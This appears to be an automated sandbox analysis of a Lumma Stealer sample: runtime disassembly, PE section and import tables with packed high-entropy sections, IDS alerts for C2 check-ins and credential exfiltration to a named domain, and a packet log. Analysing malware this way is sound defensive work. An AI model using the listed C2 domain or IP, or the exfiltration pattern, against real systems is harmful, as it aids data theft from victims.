                                                                                        jne 00007FC5B4B06D5Ch
                                                                                        or eax, 00004711h
                                                                                        shl eax, 10h
                                                                                        or ecx, eax
                                                                                        mov dword ptr [004307C0h], ecx
                                                                                        not ecx
                                                                                        pop edi
                                                                                        mov dword ptr [00430800h], ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 14h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        xorps xmm0, xmm0
                                                                                        push eax
                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                        call dword ptr [0042E8D8h]
                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                        mov dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E894h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E890h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                        push eax
                                                                                        call dword ptr [0042E920h]
                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                        xor eax, ecx
                                                                                        leave
                                                                                        ret
                                                                                        mov eax, 00004000h
                                                                                        ret
                                                                                        push 00431AB8h
                                                                                        call dword ptr [0042E8F8h]
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        mov al, 01h
                                                                                        ret
                                                                                        push 00030000h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6c40x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b90.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e8340x148.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x247da0x24800ba0610d1e4ecb6f5f64959d9eb5b455aFalse0.5549951840753424data6.559506263512015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x260000x9eb40xa00053eba87ddc7d2455b0ac2836680b1660False0.428271484375DOS executable (COM)4.9181666163124085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x350000x1b900x1c003080b38ba0e27b64b3ab5ca0f93c1c7cFalse0.7785993303571429data6.532705218372571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .BSS0x370000x4ba000x4ba00250dd5c248e14428968453ebc45126bdFalse1.0003260588842975data7.999337203877817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .BSS0x830000x4ba000x4ba00250dd5c248e14428968453ebc45126bdFalse1.0003260588842975data7.999337203877817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-31T17:37:09.693251+01002058550ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)1192.168.2.4560561.1.1.153UDP
                                                                                        2024-12-31T17:37:10.285247+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449730188.114.97.3443TCP
                                                                                        2024-12-31T17:37:10.285247+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730188.114.97.3443TCP
                                                                                        2024-12-31T17:37:10.758421+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730188.114.97.3443TCP
                                                                                        2024-12-31T17:37:10.758421+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730188.114.97.3443TCP
                                                                                        2024-12-31T17:37:11.424848+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449731188.114.97.3443TCP
                                                                                        2024-12-31T17:37:11.424848+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731188.114.97.3443TCP
                                                                                        2024-12-31T17:37:11.867229+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731188.114.97.3443TCP
                                                                                        2024-12-31T17:37:11.867229+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.97.3443TCP
                                                                                        2024-12-31T17:37:12.697496+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449732188.114.97.3443TCP
                                                                                        2024-12-31T17:37:12.697496+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732188.114.97.3443TCP
                                                                                        2024-12-31T17:37:16.450237+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732188.114.97.3443TCP
                                                                                        2024-12-31T17:37:16.980147+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449733188.114.97.3443TCP
                                                                                        2024-12-31T17:37:16.980147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733188.114.97.3443TCP
                                                                                        2024-12-31T17:37:18.395431+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449734188.114.97.3443TCP
                                                                                        2024-12-31T17:37:18.395431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734188.114.97.3443TCP
                                                                                        2024-12-31T17:37:22.852054+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449735188.114.97.3443TCP
                                                                                        2024-12-31T17:37:22.852054+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735188.114.97.3443TCP
                                                                                        2024-12-31T17:37:26.331153+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449736188.114.97.3443TCP
                                                                                        2024-12-31T17:37:26.331153+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736188.114.97.3443TCP
                                                                                        2024-12-31T17:37:26.361006+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449736188.114.97.3443TCP
                                                                                        2024-12-31T17:37:29.118021+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449742188.114.97.3443TCP
                                                                                        2024-12-31T17:37:29.118021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.97.3443TCP
                                                                                        2024-12-31T17:37:29.896418+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742188.114.97.3443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:37:09.719739914 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:09.719770908 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:09.719835043 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:09.723352909 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:09.723376036 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.285085917 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.285247087 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.293884039 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.293895006 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.294135094 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.337440968 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.350260973 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.350281954 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.350351095 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.758411884 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.758531094 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.758753061 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.788531065 CET49730443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.788573027 CET44349730188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.961338997 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.961388111 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:10.961469889 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.964643955 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:10.964657068 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.424774885 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.424848080 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.426978111 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.426989079 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.427248955 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.429259062 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.429301977 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.429331064 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867115021 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867156029 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867177963 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867217064 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867213964 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.867279053 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867341042 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.867734909 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867760897 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867794037 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.867810965 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.867866993 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.868141890 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.873902082 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.873927116 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.873955011 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.873970032 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.874030113 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.959969997 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960028887 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960071087 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960098982 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.960138083 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960161924 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960313082 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.960313082 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.960879087 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.960916996 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:11.960942984 CET49731443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:11.960958004 CET44349731188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.230325937 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.230370045 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.230446100 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.230741024 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.230756998 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.697410107 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.697495937 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.698777914 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.698793888 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.699049950 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.700212955 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.700337887 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.700368881 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:12.700437069 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:12.700444937 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.450150967 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.450314045 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.450378895 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:16.450479031 CET49732443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:16.450499058 CET44349732188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.514784098 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:16.514827967 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.514909983 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:16.515153885 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:16.515166998 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.980068922 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:16.980146885 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.005909920 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.005923033 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.006182909 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.025032997 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.025146008 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.025183916 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.748492956 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.748568058 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.748689890 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.749104977 CET49733443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.749121904 CET44349733188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.937923908 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.937969923 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:17.938046932 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.938347101 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:17.938359022 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:18.395370007 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:18.395431042 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:18.396610975 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:18.396625042 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:18.396868944 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:18.397978067 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:18.398125887 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:18.398161888 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:18.398217916 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:18.398230076 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:21.822658062 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:21.822751999 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:21.822835922 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:21.822974920 CET49734443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:21.822995901 CET44349734188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.396245003 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.396292925 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.396414042 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.396615028 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.396629095 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.851968050 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.852054119 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.854702950 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.854712009 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.854908943 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:22.861881971 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.862201929 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:22.862206936 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:25.379285097 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:25.379384995 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:25.379426956 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:25.379528999 CET49735443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:25.379545927 CET44349735188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:25.853744984 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:25.853792906 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:25.853851080 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:25.854326010 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:25.854340076 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.330873966 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.331152916 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.332082987 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.332091093 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.332324982 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.360295057 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.360295057 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.360341072 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.360517979 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.360547066 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.360661030 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.360693932 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.360811949 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.360841990 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.360974073 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361004114 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.361150980 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361175060 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.361182928 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361192942 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.361288071 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361319065 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.361336946 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361535072 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.361562014 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.370270014 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.370434999 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.370451927 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.370470047 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.370497942 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.370754004 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:26.370773077 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:26.370788097 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:28.602416992 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:28.602509022 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:28.602648973 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:28.602736950 CET49736443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:28.602756977 CET44349736188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:28.632592916 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:28.632652044 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:28.632723093 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:28.633018970 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:28.633034945 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.117961884 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.118021011 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.119477034 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.119487047 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.119702101 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.127862930 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.127890110 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.128009081 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896421909 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896491051 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896523952 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896565914 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.896578074 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896589041 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.896617889 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.896986961 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.897034883 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.897053003 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.897164106 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.897202015 CET44349742188.114.97.3192.168.2.4
